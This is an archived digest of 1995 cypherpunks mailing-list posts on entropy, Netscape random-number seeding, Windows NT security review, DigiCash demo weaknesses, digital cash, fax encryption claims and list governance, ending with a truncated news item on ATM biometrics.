From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 26 Sep 95 14:56:30 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: More on "Entropy"
Message-ID: <30687699@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



David Van Wie wrote:

>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Timothy C. May wrote:

>Hah! Another physicist converted to the information-theoretic view of 
entropy!

Indeed.  I was able to track down the literature, and it is most 
interesting.  I am still a little bit skeptical of the "superset including 
thermodynamic entropy" school of thought, but I haven't finished reading all 
of the materials yet!  Clearly, the IT "version" of entropy is a well 
defined and useful thing....

>I should've pointed out in my reading list that several names stand out in
>this interpretation:

I'll read with that endoresement in mind.  Your thoughts on rigorous, 
_concise_, design criteria for sources of entropy would be appreciated 
(unless there is good quality work in the literature I haven't come to yet).

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 26 Sep 95 14:57:20 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Netscape "random" number seed generator code available
Message-ID: <3068769F@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton wrote:

>[You will be expected to show your work. :-)]

In the spirit of showing work, how about a run through your entropy series?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Sep 95 13:03:05 PDT
To: cypherpunks@toad.com
Subject: IBE_dam
Message-ID: <199509262002.QAA17680@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-26-95. W$Japer:

   "On-Line Service to Assist Global Trade."

      A group of multinational companies is expected to unveil
      today an on-line service to businesses to engage in
      international trade. Dubbed IBEX, it is a joint effort
      of AT&T, Dun & Bradstreet, General Electric and the U.S.
      Chamber of Commerce to let businesses use on-line
      traffic to line up suppliers, negotiate contracts, make
      and receive bids, and arrange the delivery of goods and
      services around the world. IBEX expects the backing of
      Chase Manhattan, Microsoft, DEC and Simon & Schuster.

      The IBEX software allows companies to sign on and submit
      a request for goods or services, which is posted
      anonymously. The request could be styled using an array
      of categories offered by the service, including
      location, product category, payment and shipping terms.
      The customer would then receive bids from businesses
      hoping to land the contract. Once a bid is chosen, the
      identities of the businesses are disclosed and
      negotiations begin. IBEX allows them to attach documents
      such as confidentiality agreements, contracts and
      purchase orders.


   IBE_dam  (5 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 26 Sep 95 13:46:55 PDT
To: cypherpunks@toad.com
Subject: Re: Hack Microsoft?
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <9509262046.AA18525@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>   Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>they approve C2.

Well yes and no, C2 is not a particularly high security rating. It is also a 
fairly obsolete set of requirements. So if anyone is to claim a breach of a C2 
system it had better be one within the C2 assurances, not something that is only 
covered in the B series criteria. What really matters is the combined criteria 
which should have/would have emerged from NIST had the issue of harmonising the 
US/Canadian criteria with the European ones turned up.

As a cypherpunks aside we reviewed the orange book criteria in a reading group 
here at MIT a few months back. One point that was made was that Orange Book does 
not consider cryptographic security systems which was generally considered a 
disappointment.

Obviously Windows NT is "fair game" for analysis. Remember however that it is an 
established operating system and that there are many people who rely on it. I 
think that if people want to go down that route they should start by 
establishing a contacts with CERT and Microsoft in order to make sure that 
people whose businesses depend on the security of their O/S are not compromised. 
You may well find that Microsoft is willing to give you free copies of WNT to do 
this type of work on.

I think that this would be a really good project. The more independent analysis 
of an operating system that takes place the more confidence people can place in 
it. Windows NT is in many ways a descendent of VMS which has a very good 
security record. There is no reason why Windows NT should not mature to that 
level of security. It was built with security in mind after all, unlike UNIX 
sitation security was never more than an afterthought and often merely wishfull 
thinking.

There are an awful lot of WNT seats out there already. I expect them to 
outnumber UNIX very soon. The only thing that is holding it back is the 
relatively small size of the userbase compared to windows and the resources 
required to run it. WNT requires similar CPU and memory to UNIX which is hardly 
suprising since it is doing very much the same thing.

I would suggest however that the project is structured and coordinated in some 
fashion. Someone should keep a list of security concerns that have been 
addressed and checked. That list should have some structure such as a division 
into the main risk categories (Authenticity, confidentiality, Service) so that 
people can get a feel for how thoroughly the space is being searched. Later on 
that list is likely to be one of the most valuable end results of such a 
project.


		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Tue, 26 Sep 95 17:26:57 PDT
To: vince@offshore.com.ai>
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <199509270005.UAA16643@frankenstein.piermont.com>
Message-ID: <9509261708.ZM150@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 26,  8:05pm, Perry E. Metzger wrote:
> > I still think that the low bits of the mouses X and Y positions as the
> > user moves the mouse around the screen are a very good source of random
> > bits for Netscape.
> 
> Agreed.

  In case it is not clear from our previous postings, our patched
version will continually feed position and time of user events
through the RNG hash, in addition to any seeding that we do on
startup.  In the case of X, we use both the X event time from
the server, and the current time (based on the highest resolution
clock available in the client).

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 26 Sep 95 17:32:07 PDT
To: ecm@ai.mit.edu
Subject: weak links in DigiCash system
Message-ID: <199509262333.RAA01743@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Jerod, I'm forwarding your message to a couple of lists.  I thought you
made good points.  Of course DigiCash is only running a demo, but still--
why demo poor security?  I think it doesn't make a good impression.


Bryce, signatures at end


- ------- Forwarded Message

To: ecash-feedback@digicash.com
cc: netherto@taussky.cs.colorado.edu, wilcoxb@taussky.cs.colorado.edu
Subject: Security in your ecash project.
Date: Tue, 26 Sep 1995 17:00:15 -0600
From: Jerod D Netherton <netherto@taussky.cs.colorado.edu>

I have a couple of problems/complaints with your ecash project.
When I was sent my Acct ID and Passwd they were sent to me plain text
instead of being PGP-encrypted first.  This means that some malicious
hacker could have intercepted the e-mail message and stolen the
free cyber-bucks you were so generous as to give me.  Second, on the
WWW-page where one downloads the software it does not seem to do a secure
connection between my browser and your server (on netscape there is
a small key in the lower-left hand corner that is supposed to show when
one is securely connected to a secure server).  So someone could sniff my
password from the transaction when I GET the software.  Also When I'm
buying/selling things it would be smart for all parties involved to
be using PGP, and I think you should stress this point more in your page.
Otherwise this is another vulnerable point in your system IMHO.
Thank you for your time.

  /\ The Scottish Claymore of All CyberSpace      UgradLab DumpMeister
 /\  Watcher of Anime.  Addictor to Muds.      WebMaster of OAA at CU!
<    E  A  N  O  R       JaDuN Comes.            Shade and Sweet Water
 \/               Yuri, Miyu, Nene, Ranma-chan, Ryoko, B-ko!
  \/ Anime, Chivalry, and Physics Forever!!!!	    Finger for PGP Key
Email:netherto@colorado.edu  Phone:(303)786-8311   Pager:(303)610-1203
http://ugrad-www.cs.colorado.edu/~netherto/Home.html Lab:(303)492-6207

- ------- End of Forwarded Message

signatures follow


To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMGiNz/WZSllhfG25AQHFMAQApc6Td8e6bQsBqpCU+EnfbYhueJthyYPS
rkHfFrenHNwG/MCEFtwXBBxEQP3yyvnY2qD9RrrhC3cN0HcFw2jE8r++2Y3Z9H7u
dJuIKodi2LP8POoW6dJPlW93N5E/+LhuCZvfqe78T2bIl20GIYQ5x0UUTm+APo2f
MLu6wUEAHTE=
=ofwj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton <karlton@netscape.com>
Date: Tue, 26 Sep 95 17:54:15 PDT
To: sameer <sameer@c2.org>
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <3068A092.31E4@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
 
>         I haven't seen any mention of this feature in 2.0, so if the
> feature exists in 2.0, then great! Otherwise, unless Netscape is going
> to allow for alternte cert agencies on a specific timescale, I think
> we have to do something about it in order to force the issue.

Netscape has already annonced that for 2.0, the user will be able to accept (trust)
(or reject) any set of certificate authorities for signing of certificates.

I briefly looked for a copy of that announcement, but I could not find it.

PK
--
Philip L. Karlton                       karlton@netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: imschira@nyx10.cs.du.edu (Ian M. Schirado)
Date: Tue, 26 Sep 95 17:44:32 PDT
To: cypherpunks@toad.com
Subject: (fwd) FBI COMPUTER FRAUD WEB SITE DIVISION
Message-ID: <9509270000.AA22231@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


Path: mnemosyne.cs.du.edu!uunet!in2.uu.net!noc.near.net!das-news2.harvard.edu!oitnews.harvard.edu!newsfeed.rice.edu!news.sesqui.net!news.concom.com!news
From: Rick Casimir <rikkkk@concom.com>
Newsgroups: misc.forsale.computers.pc-specific.misc
Subject: FBI COMPUTER FRAUD WEB SITE DIVISION
Date: 21 Sep 1995 17:47:42 GMT
Organization: Connections.Com
Lines: 9
Message-ID: <43s8fu$r4t@carbon.concom.com>
NNTP-Posting-Host: dial139.concom.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 1.1PE (Windows; I; 16bit)

HELLO,

If you or someone you know who has been scammed or did"nt ship you 
products after you prepaid or for whatever reason who screwed you.

REPORT THEM TO THE FBI:

<http://www.fbi.gov/compcrim.htm>


--

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 26 Sep 95 15:31:07 PDT
To: cypherpunks@toad.com
Subject: Internet draft on MIME/PGP
Message-ID: <Pine.3.89.9509261845.C17046-c100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don't want to start another MIME war, but thought some on the list might 
be interested in this.


---------- Forwarded message ----------
Date: Tue, 26 Sep 95 15:10:57 -0400
From:Internet-Drafts@CNRI.Reston.VA.US
To: IETF-Announce:  ;
Subject: I-D ACTION:draft-elkins-pem-pgp-00.txt

A New Internet-Draft is available from the on-line Internet-Drafts 
directories.                                                               

       Title     : MIME Security with Pretty Good Privacy (PGP)            
       Author(s) : M. Elkins
       Filename  : draft-elkins-pem-pgp-00.txt
       Pages     : 3
       Date      : 09/25/1995

This document describes how Pretty Good Privacy (PGP) can be used to 
provide privacy and authentication using the Multipurpose Internet Mail 
Extensions (MIME) security content types described in RFCXXXX 
(draft-ietf-pem-sigenc-03.txt).                                            

Internet-Drafts are available by anonymous FTP.  Login with the username
"anonymous" and a password of your e-mail address.  After logging in,
type "cd internet-drafts" and then
     "get draft-elkins-pem-pgp-00.txt".
A URL for the Internet-Draft is:
ftp://ds.internic.net/internet-drafts/draft-elkins-pem-pgp-00.txt
 
Internet-Drafts directories are located at:	
	                                                
     o  Africa                                   
        Address:  ftp.is.co.za (196.4.160.8)	
	                                                
     o  Europe                                   
        Address:  nic.nordu.net (192.36.148.17)	
        Address:  ftp.nis.garr.it (192.12.192.10)
	                                                
     o  Pacific Rim                              
        Address:  munnari.oz.au (128.250.1.21)	
	                                                
     o  US East Coast                            
        Address:  ds.internic.net (198.49.45.10)	
	                                                
     o  US West Coast                            
        Address:  ftp.isi.edu (128.9.0.32)  	
	                                                
Internet-Drafts are also available by mail.	
	                                                
Send a message to:  mailserv@ds.internic.net. In the body type: 
     "FILE /internet-drafts/draft-elkins-pem-pgp-00.txt".
							
NOTE: The mail server at ds.internic.net can return the document in
      MIME-encoded form by using the "mpack" utility.  To use this
      feature, insert the command "ENCODING mime" before the "FILE"
      command.  To decode the response(s), you will need "munpack" or
      a MIME-compliant mail reader.  Different MIME-compliant mail readers
      exhibit different behavior, especially when dealing with
      "multipart" MIME messages (i.e., documents which have been split
      up into multiple messages), so check your local documentation on
      how to manipulate these messages.
							
For questions, please mail to Internet-Drafts@cnri.reston.va.us.
							

Below is the data which will enable a MIME compliant mail reader 
implementation to automatically retrieve the ASCII version
of the Internet-Draft.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 26 Sep 95 17:35:26 PDT
To: Dan Bailey <dan@milliways.org>
Subject: Re: Hack Microsoft?
In-Reply-To: <199509261433.AA11352@ibm.net>
Message-ID: <9509262257.AA28908@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 26 Sep 95 10:33:07 EDT
    From: Dan Bailey <dan@milliways.org>

    For fun ways to hack NT, check out http://www.somar.com/security.html.

Thanks for the pointer.  The URL is acutally
http://www.somar.com/security.htm (no `l'), but it's easy to find as a
link near the top of http://www.somar.com/

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 26 Sep 95 19:00:33 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
Message-ID: <9509270202.AA17457@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger"

There is this widespread and wholely misplaced affection for
"cypherpunks". We aren't a company or an organization. This is a
mailing list, and occassionally a seminar series in places like
NoCal. It isn't a "group".
..............................................

And you of all the cpunks, Perry, are the most affectionately considered. :>)

Actually, those who want to become official spokewheels should consider that 
the cypherpunk agenda is to promote anarchic (i.e. individualistic, 
self-responsible) action.  That is, that the individual who chooses to act in a 
'cypherpunkish' mode does so at their own risk by their own motivation by their 
own decision and their own discretion.  Not everyone on the list subscribes to 
this ideal of complete independence; furthermore, for anarchist types to 
identify with a "group" would be inconsistent with the philosophical attitude 
of the "members", who come-&-go as they please.

However, it would be an amazing event to see VZ Nuri-logical (Cypherpunk 
Extraordinaire) on TV, saying something like, "Yes, I fully and completely 
subscribe to the Cypherpunk agenda:  black markets, anarchy, overthrow of 
governments.  National borders are just speed bumps on the information 
superhighway."

<g> 
(It would be a *cold* day in Hell!)

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 17:30:39 PDT
To: mkj@october.ducktown.org
Subject: Re: cypherpunks press releases/contact list
In-Reply-To: <199509261623.AA00939@october.ducktown.org>
Message-ID: <199509262341.TAA16602@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



mkj@october.ducktown.org writes:
> For better or worse, in the media we ARE a group,

I don't care. Anyone claiming to represent "cypherpunks" will be lying
-- at the very least, they will not be representing Tim May, and they
will not be representing me.

Given that there is no organization, you can't get the organization to
agree on anything anyway. If you claim to represent the group, you'll
just be lying.

No one is going to be representing "Perry Metzger", either. I don't
want anyone on earth pretending to represent me, as I'm the only
person who can state my views authoritatively.

Who gives a damn, anyway? Its not as though we have a "cypherpunks"
reputation to uphold.

If you want to get associated with something, go out and crack a
cryptosystem on your own. Quit thinking "group".


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 17:27:37 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <Pine.3.89.9509261538.C922-0100000@offshore.com.ai>
Message-ID: <199509270005.UAA16643@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Vincent Cate writes:
> While it is true that on some versions of X you can watch mouse events on
> other peoples computers, it is also true that on some versions you can
> watch keyboard input.

On my secure systems, when a machine running X has to be on an
insecure network, I compile the X server so that it physically lacks
the ability to speak to the network -- it does all its IPC via unix
domain sockets. However, you are correct that most people don't take
precautions like I do.

> At CMU Bennet Yee wrote a program to get peoples
> passwords as they typed them in using X's poor/non-existent security back
> then.  This was before xauth. 

Xauth isn't secure, as folks have shown.

> I still think that the low bits of the mouses X and Y positions as the
> user moves the mouse around the screen are a very good source of random
> bits for Netscape.

Agreed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 17:32:21 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cypherpunk press releases vs. FAQ
In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com>
Message-ID: <199509270032.UAA16680@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> earlier I advocated a press release mechanism, and this is getting
> flamed to smithereens by the more libertarian/cryptoanarchists
> elements of the group, as I predicted (but geez, accusing me
> of *deliberately* trying to start a flamewar here really hurts
> my feelings! if I were really that mischievous, the meager return would
> be quite an insult to my expertise.. <g>).

So you admit that you are, in fact, Detweiler. As if there was
any doubt.

> what I had in mind was a more FAQ-like cypherpunks document,

There is nothing wrong with Tim's document, which already exists.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 17:35:38 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Stock Prices
Message-ID: <v02120d06ac8e4b588d84@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 9/26/95, Jeff Simmons wrote:

>Date     High     Low   Close   Volume
>
>950809  75.000  53.750  55.500  3851.8
:
:
>950925  69.000  62.250  67.000  684.0     WSJ article re: overflow bug

Yup. Looks like the old "wall of worry" trick to me. Stand back and let the
train go buy folks, madness of crowds and all that.

Actually, Netscape is still the only game in town as far as Wall Street
goes.  What the market needs is a foregone alternative, and some lucky
sailor to mistake a tulip bulb for an onion...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Sep 95 17:57:49 PDT
To: cypherpunks@toad.com
Subject: CHA_cha
Message-ID: <199509270057.UAA29759@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Worth Magazine, October, 1995, has a longish, easy-reading,
   supportive article on David Chaum and digital cash.

      Virtually alone among E-money thinkers, Chaum insists on
      creating anonymity for all transactions -- building a
      tamper-proof system that works just as "real" cash
      always has, from cowne shells to $100 bills. The key, he
      says, is this: Without the spender's say-so, no one
      should be able to trace who paid whom for what, whether
      a transaction takes place online or in a swipe of a card
      at a coffee shop. It's a libertarian approach in tune
      with Chaum's roots in freewheeling communities such as
      Berkeley and Amsterdam -- but it is anathema to control
      freaks like the FBI, the IRS, and corporate information
      marketers.

      Chaum says every digital-cash system but his has the
      potential to be abused or compromised -- and the math
      seems to bear him out. His competitors, however, insist
      their plans will prove plenty secure in practice. They
      dismiss Chaum as an incorrigible purist, a brilliant
      mathematician and innovator whose political views are
      hindering his chances of success.

      Like many in the digital elite, Chaum, an unabashed
      utopian, does want to create a new world. To him,
      electronic money is just the first consumer use of an
      arcane field he hopes will transform society:
      cryptology, the science of secret codes. In cyberspace,
      these codes can prove a powerful way of shielding a
      person's identity -- or of verifying an identity without
      giving away extra information. Armed with personal
      computers and good software, says Chaum, ordinary people
      will finally have the power to do and say things without
      being tracked by Big Brother.


   CHA_cha  (31 kb in two parts)










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Sep 95 21:47:49 PDT
To: cypherpunks@toad.com
Subject: Fax encryption software
Message-ID: <Pine.3.89.9509262116.A7081-0100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain



	I saw this article in alt.privacy.

	Anybody think the described encryption actually is worth 
	looking at.


Xref: netcom.com alt.privacy:29325
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!EU.net!uunet!in2.uu.net!news.deltanet.com!lkf0166
From: clav@deltanet.com
Newsgroups: alt.privacy
Subject: Re: FAX Encryption Software
Date: Mon, 18 Sep 95 12:39:53 GMT
Organization: Delta Internet Services, Anaheim, CA
Lines: 59
Message-ID: <43k3nv$m9@news1.deltanet.com>
References: <43hvft$n2b@news1.deltanet.com> <43ii1t$210@nntp.crl.com>
NNTP-Posting-Host: lkf0166.deltanet.com
X-Newsreader: News Xpress Version 1.0 Beta #3

Dear Mr. Chaos,

We are talking about a 72 bit engine that is more than 
sufficiently strong for time sensitive general business purposes. 
In addition it does not rely merely on simple factoring but a 
process called graphical encryption that adds additional 
difficulty to an attack. I would like to see if your cracking 
abilities are anywhere near your abilities to return an 
uninformed answer. I invite you to try your skill.

David
_________________________________________________________________
_____________

In article <43ii1t$210@nntp.crl.com>, acollier@crl.com wrote:
>clav@deltanet.com wrote:
>
>>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY 
>>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE???
>
>>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email 
>>encryption package called PrivaSoft.
>
>>Unlike any previously devised system, this method protects, 
with 
>>only 4 mouse clicks, fax and email transmissions in electronic 
>>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL 
IT 
>>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. 
>
>>You can encrypt a message, and then fax or email it (via plain 
>>old standard fax machine or fax modem), print it to paper or 
save 
>>to a disk file.
>
>>It is fully licensed, without restriction for export, by the 
U.S. 
>>Department of Commerce. NO PGP WORRIES.
>
>Also no worries about security - if DOC says you can have it, 
you can bet
>that NSA has seen to it that it is cryptographically weak, or 
else uses a
>key escrow system (where sombody else can get to the keys), and 
as insecure
>as any other non-published method.  For all we know, they may be 
using a
>cereal box decoder ring set up.
>
>>Email me for a free copy which will be sent to you via email or 
>>snail mail post. It is fully functional (not crippleware) and 
>>enables you to try our system out before purchase with 8 free 
>>page scrambles. It retails for $130 per installed computer. 
>>Looking for end users and distributors.
>
>>Thanks,
>>David
>
>

--

	To subscribe to Graphology-L send e-mail 
	to: listserv@netcom.com / subject: leave blank
	message:  subscribe graphology-l@netcom.com <your internet address>

	To get the Graphology-L FAQ send e-mail to
	grafolog@netcom.com / subject: hwafaq / no message

^






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pays@gctech.edelweb.fr (Paul-Andre Pays)
Date: Tue, 26 Sep 95 13:40:46 PDT
To: "Phillip M. Hallam-Baker" <hallam@w3.org>
Subject: Re: First Payments WG Meeting Announcement
Message-ID: <v01530509ac8e11166b13@[193.51.12.40]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:41 26/09/95, Phillip M. Hallam-Baker wrote:
>The World Wide Web Consortium is holding a Workshop on payments. The workshop
>is intended to be a small, technically oriented meeting of its payments working
>group. Although it is a members only event I am willing to listen to special
>pleading, alternatively companies may wish to join the consortium at our
>extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
>details.
>
>--
>Phillip M. Hallam-Baker            Not speaking for anoyone else
>hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
>Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!
>
>ANNOUNCE: First W3C Payments WG Meeting, October 11
>
>----------------------------------------------------------------------------
>
>What: 1st W3C Payment WG Meeting
>
>Where: MIT EECS, Grier Room 34-401 (subject to change)
>
>When: Wednesday October 11, 9am - 5pm
>


All that is extremely fine and an awaited initiative BUT for one point
   the EXTREMELY SHORT DELAY and notification!!!!!!


Our company is just in the "joining the consortium" process,
   especially because we were expecting such an event.

However, to be able to catch a flight and spend a couple of days at MIT
  within less than a fortnight is another matter.

I don't yet know if we will able to attend, and we really would
hate to be unable to attend and participate.
Thus I  would urge the Web Consortium to consider postponing this meeting for
at least 2 or 4 weeks so that any interested party is able
to decently cancel other commitments and get prepared for the meeting.
If W3C is really interested in attracting all interested party,
it would be fair as I suspect we are not the only ones with

Please let me know as soon as if this is possible or if
I must as soon as possible try to change my agenda.

regards,

-- PAP



_________________________________________________________________________
PAP:  paul-andre.pays@gctech.edelWeb.fr
     tel:  +33 1 34 52 00 88                fax: +33 1 34 52 25 26
         GC Tech   "The Globe Online and Globe ID Technology Company"
  http://www.globeonline.fr/                 http://www.gctech.fr/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Remailing Service <nobody@armadillo.com>
Date: Tue, 26 Sep 95 21:02:15 PDT
Subject: Time Keys, Some Secure Ideas (by Alias: Jay Hyden)
Message-ID: <199509270256.VAA09199@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

             >> Time Keys, Some Secure Ideas <<

 The weakest attack on a time key based system is to spoof the
computer that keeps track of time into releasing encryption
keys i.e. change the clock.
 Perhaps this could be avoided by hardware inaccessability,
say a computer system taken to, and setup on the Moon by those
corporation that are already planning to place VR rovers on
the lunar surface.
 Any Earth bound system would be vulnerable to physical attack.

Here are some ideas for such a system:

o 7 clocks with absolutely no way of reseting them. Perhaps a
  system that will only let you tell it which clock is the most
  accurate, and only if you prove you are the proper authority
  and only if 4 other clocks are on the same minute.

o Redundant hardware and power collection and data transmit
  /receive systems, flash ROM hard drives for storing secret
  keys and neccesary programs and files. Built to last
  several centuries if possible.

o Key pairs could be generated on Earth, a time of release
  instruction and perhaps an optional other public key a
  (return at future date encrypted with this key option.)
  The package is then encrypted with one of the lunar
  systems keys, then transmited to the Moon. A verification
  could be encypted and sent back to insure data integrity.

o Other security checks in place would insure that the data
  was transmited to the Moon by the proper authority, i.e.
  the Corp. charging for this service. Additional backup
  logic that would insure that proper power and protocol
  exist for transmitions from the lunar system.

o The key pairs are witness generated, then sent to the lunar
  system, then the secret key is destroyed on Earth. The
  public keys become a one way hash to the future until the
  time designated by the key's owner has elapsed. Then the
  lunar system would transmit the owners secret key to Earth.

o  Upon time released instructions the lunar system would
   transmit the secret key, (encrypted if optioned) upon
   demand by a known packet radio method. So if the Corp.
   authority did not exist in say, 100 years, the data could
   still be retrieved by standard packet radio.

People who want to write to ONLY their great great grand-
children or the future world in general would have a forum.

Jay

  /"""""\    ~~ ,--------------------------------------------,   ~~ /"""""\  
 /__ - _-\  ~~ ( End HEMP Prohibition! This is an open chal- )  ~~ /-_ - __\ 
:@  (*)~(*) ~  ( lenge to Historians. Name examples of where )  ~ (*)~(*)  @:
:%/--~ ))~: ~  (& when the cultivation of legal hemp was harm-) ~ :~(( ~--/%:
 \__"-==-===*  ( ful or destructive to a society in any way! )  *===-==-"__/ 
  (:"\_)_/     (<jay.hyden@alpha.c2.com> PublicKey on Servers)     \_(_/":)  
.//:%:%:\.     '---------------------------------------------'     ./:%:%:\\.
=000o====o000===================================================000o====o000=
   |      |      |      |      |      |      |      |      |      |      |   
- -----------------------------------------------------------------------------
|      |      |      |      |      |      |      |      |      |      |     |
- -----------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGiLha7iRhcfEZiZAQEn0QP6A8cUmI0MHs866Mu/Ao4mFqr89F8tT3oP
KeafNdSWJt8/pOlVZzQxV8P8S8dCkXwBgJJQaQ6tigqtD2+9fK1HEaWi3ZBAVgB+
CwLhqouwds2A5+l9riQfqAT+4yrSbeNR+bH3xyYa8zZSTzp5DB1tJEbWls6Kjr/w
hxmFYrf6oSk=
=oHrR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Tue, 26 Sep 95 15:21:03 PDT
To: cypherpunks@toad.com
Subject: Banks eyeball sci-fi style identification for ATMs
Message-ID: <9509262156.AA26030@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




Date: Sun, 24 Sep 1995 10:20:05 PDT
  	  	
	  NEW YORK (American Banker) - Biometric identification, a 
process formerly seen only in futuristic movies and 
high-security government offices, may soon become part of the 
most common consumer banking transactions.  
	 Bankers' interest in biometric ID -- a sophisticated 
antifraud measure that exploits the fact that every human 
possesses unique physical characteristics -- dates back more 
than a decade.  
	 But until recently most banks and equipment manufacturers 
have watched the development of technology that recognizes 
fingerprints, voices, and other personal traits from a distance.  
	 That has begun to change, experts said. One of the companies 
leading the charge toward everyday use of biometric 
identification in banking is Sensar Inc., a Princeton, 
N.J.-based company that is developing an automated teller 
